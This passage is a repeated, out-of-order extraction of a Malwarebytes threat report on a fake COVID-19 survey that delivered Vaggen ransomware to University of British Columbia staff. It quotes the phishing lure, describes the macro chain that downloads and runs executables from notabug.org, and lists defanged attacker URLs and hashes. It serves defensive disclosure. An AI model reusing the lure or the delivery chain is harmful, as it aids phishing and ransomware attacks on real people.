3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2492 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2493 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2494 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2495 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2496 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2497 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2498 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2499 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2500 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2501 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2502 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2503 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2504 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2505 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2506 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2507 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2508 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2509 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2510 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2511 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2512 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2513 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2514 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2515 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2516 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2517 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2518 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2519 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2520 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2521 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2522 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2523 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2524 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2525 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That 